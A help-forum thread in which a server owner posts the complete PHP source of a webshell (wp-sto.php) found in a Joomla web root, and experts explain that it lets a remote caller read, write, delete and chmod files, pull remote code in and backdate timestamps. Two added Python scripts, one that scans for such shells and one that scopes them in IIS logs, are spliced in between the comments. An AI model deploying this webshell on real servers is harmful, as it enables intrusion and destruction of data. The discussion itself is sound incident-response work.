Solved

strange file suddenly appeared

Posted on 2013-12-14
Last Modified: 2013-12-14
Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site, and today I noticed that a strange file was added at my site root 4 days ago; I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP that I'm not entirely sure what it's all supposed to be doing or what its origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php, but WordPress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>


Any ideas?

Thanks
Question by:billium99
10 Comments
 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39718988
I only took a look, but if I were you I would immediately back up those files on my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions and deletes files, and these are things only you should do: if you're not sure about it, don't trust it.

I don't know Joomla, but I doubt any framework can create such files: I repeat, copy them to an inoffensive location and delete them from the server, then talk with the host provider.
0
 
LVL 1

Author Comment

by:billium99
ID: 39718997
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39718999
Yes, get rid of that file.
0
 
LVL 31

Expert Comment

by:Marco Gasi
ID: 39719007
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the PHP command to delete files.
0
 
LVL 83

Assisted Solution

by:Dave Baldwin
Dave Baldwin earned 125 total points
ID: 39719053
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
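To make the "$_GET variables drive everything" point concrete from the defender's side, here is an added triage script (not from this thread, not part of Joomla or PHP): it walks a web root and flags PHP files in which request parameters are read and file-changing calls (unlink, chmod, file_put_contents, mkdir, touch and friends) appear in the same file, and it separately notes the self-disclosure branch where the script returns its own source. The embedded samples are a constructed, condensed excerpt of the wp-sto.php listing above and a constructed benign page; the sink list and the line-based matching are assumptions of this example, not a definition of what PHP considers dangerous.

```python
import os
import re
import sys

# Request-controlled superglobals: values read from these are attacker-supplied.
SUPERGLOBAL_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
PARAM_RE = re.compile(r"\$_(?:GET|POST|REQUEST)\[\s*['\"]([^'\"]+)['\"]\s*\]")

# Filesystem, network and execution calls worth a second look inside a web root
# (assumed list for this example).
SINKS = (
    "unlink", "chmod", "mkdir", "rmdir", "touch", "fopen", "fwrite",
    "file_put_contents", "file_get_contents", "curl_init",
    "eval", "system", "exec", "shell_exec", "passthru",
)
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(")
# Calls that modify the server: request data feeding these is the remote file-manager pattern.
DESTRUCTIVE = {"unlink", "chmod", "mkdir", "rmdir", "touch", "fwrite", "file_put_contents"}
# A script that hands back its own source on request (the ?sc=1 branch in wp-sto.php).
SELF_DISCLOSURE_RE = re.compile(r"file_get_contents\s*\(\s*__FILE__\s*\)")


def scan_php(source: str) -> dict:
    """Return triage indicators for one PHP source string.

    The check is line-based and deliberately simple: it reports which request
    parameters are read, which sinks are called (with line numbers, function
    definitions included) and whether request data and destructive sinks
    coexist in the same file.
    """
    params = set()
    sinks = {}
    serves_own_source = False
    for lineno, line in enumerate(source.splitlines(), 1):
        params.update(PARAM_RE.findall(line))
        for m in SINK_RE.finditer(line):
            sinks.setdefault(m.group(1), []).append(lineno)
        if SELF_DISCLOSURE_RE.search(line):
            serves_own_source = True
    uses_request_data = SUPERGLOBAL_RE.search(source) is not None
    return {
        "request_params": sorted(params),
        "sinks": sinks,
        "serves_own_source": serves_own_source,
        # Attacker-controlled input plus file-changing calls is the webshell signature.
        "suspicious": uses_request_data and bool(DESTRUCTIVE & set(sinks)),
    }


def scan_tree(root: str) -> list:
    """Walk a web root and return (path, findings) for every suspicious .php file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_php(fh.read())
            if findings["suspicious"]:
                hits.append((path, findings))
    return hits


# Constructed sample: a condensed excerpt of the wp-sto.php listing posted above.
WP_STO_EXCERPT = """<?
if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
if (isset($_GET['del'])) { unlink($_GET['del']); die();}
$chmod_name=$_GET['chmod_name'];
$chmod_mod=intval($_GET['chmod_mod'], 8);
if ($chmod_name) { chmod ($chmod_name, $chmod_mod); echo "ok chmod"; }
?>"""

# Constructed sample: an ordinary page that reads a parameter but touches no files.
BENIGN_EXCERPT = """<?php
$name = htmlspecialchars($_GET['name'] ?? 'world');
echo "Hello, $name";
?>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, findings in scan_tree(sys.argv[1]):
            print(path, findings["request_params"], findings["sinks"])
    else:
        print(scan_php(WP_STO_EXCERPT))
```

Run it as `python scan.py C:\inetpub\wwwroot` (path is an example) to list candidate files with the parameters they read and the sinks they call; a hit is a reason to pull the file offline and compare it against a known-good copy of the site, not proof of compromise on its own, since legitimate admin tools also write files.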
 
LVL 83

Expert Comment

by:Dave Baldwin
ID: 39719059
And yes, someone broke into your server.  You should change passwords for all access.
0
 
LVL 31

Assisted Solution

by:Marco Gasi
Marco Gasi earned 125 total points
ID: 39719060
Yes, indeed. I was reading the code: really, I don't understand exactly what it does and in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file, passing it some parameters, and do something bad like delete your files, even empty whole directories...

Change all passwords and secure your dedicated server, because it has been violated. I'm sorry.
0
 
LVL 35

Assisted Solution

by:gr8gonzo
gr8gonzo earned 125 total points
ID: 39719067
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
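Whether the file arrived through a Joomla exploit or stolen credentials is something the IIS logs can usually answer, so here is an added scoping script (not from this thread, not an IIS or Joomla tool): it parses W3C extended log lines using the #Fields directive, finds every request to wp-sto.php, lists the query parameter names used (they map directly to the branches in the posted file) and the client addresses, and then pulls the first client's requests in the preceding window, which is where the upload vector is most likely recorded. The log excerpt is constructed, uses documentation IP ranges, and the Joomla URLs in it are placeholders; the column set and the 30-minute window are assumptions of this example.

```python
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Constructed IIS W3C extended log excerpt (not real traffic). Addresses are
# documentation ranges and the Joomla request URLs are placeholders, not a
# specific exploit.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2013-12-10 03:14:02 10.0.0.5 GET /index.php option=com_example 203.0.113.7 Mozilla/5.0 200
2013-12-10 03:14:05 10.0.0.5 POST /index.php option=com_example&task=upload 203.0.113.7 Mozilla/5.0 200
2013-12-10 03:14:09 10.0.0.5 GET /wp-sto.php scmd5=1 203.0.113.7 Mozilla/5.0 200
2013-12-10 03:15:30 10.0.0.5 GET /wp-sto.php read=configuration.php 203.0.113.7 Mozilla/5.0 200
2013-12-11 11:02:11 10.0.0.5 GET /index.php - 198.51.100.20 Mozilla/5.0 200
2013-12-12 22:41:50 10.0.0.5 GET /wp-sto.php f_creat_url=example.invalid/x.txt&f_creat_name=cache 198.51.100.44 curl/7.30 200
"""


def parse_w3c(text: str):
    """Yield one dict per request line, naming columns from the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        if fields is None:
            raise ValueError("log data before #Fields directive")
        values = raw.split()
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec


def scope_webshell(text: str, shell_path: str = "/wp-sto.php", window_minutes: int = 30) -> dict:
    """Summarise every request to the shell and the first client's activity just before it."""
    records = list(parse_w3c(text))
    shell_hits = [r for r in records if r["cs-uri-stem"].lower() == shell_path.lower()]
    if not shell_hits:
        return {"first_seen": None, "hits": 0, "client_ips": set(), "params": [], "precursors": []}
    first = min(shell_hits, key=lambda r: r["ts"])
    # Parameter names reveal which branches of the script were exercised.
    params = set()
    for r in shell_hits:
        if r["cs-uri-query"] != "-":
            params.update(parse_qs(r["cs-uri-query"], keep_blank_values=True))
    # Requests from the same client shortly before the first hit: candidate upload vector.
    window_start = first["ts"] - timedelta(minutes=window_minutes)
    precursors = [
        r for r in records
        if r["c-ip"] == first["c-ip"] and window_start <= r["ts"] < first["ts"]
    ]
    return {
        "first_seen": first["ts"],
        "hits": len(shell_hits),
        "client_ips": {r["c-ip"] for r in shell_hits},
        "params": sorted(params),
        "precursors": precursors,
    }


if __name__ == "__main__":
    result = scope_webshell(SAMPLE_LOG)
    print("first seen:", result["first_seen"], "from", result["client_ips"])
    print("parameters used:", result["params"])
    for r in result["precursors"]:
        print("precursor:", r["ts"], r["cs-method"], r["cs-uri-stem"], r["cs-uri-query"])
```

Point it at the real log folder (for IIS 7 on Windows 2008 that is normally under `%SystemDrive%\inetpub\logs\LogFiles`) by reading each file into `scope_webshell`; if the first hit has no precursor requests at all, the file most likely arrived by a channel the web log does not see (FTP, RDP, a stolen account), which is exactly the distinction gr8gonzo's comment draws.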
 
LVL 110

Accepted Solution

by:Ray Paseur
Ray Paseur earned 125 total points
ID: 39719072
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
LVL 1

Author Closing Comment

by:billium99
ID: 39719182
Thanks
0

Question has a verified solution.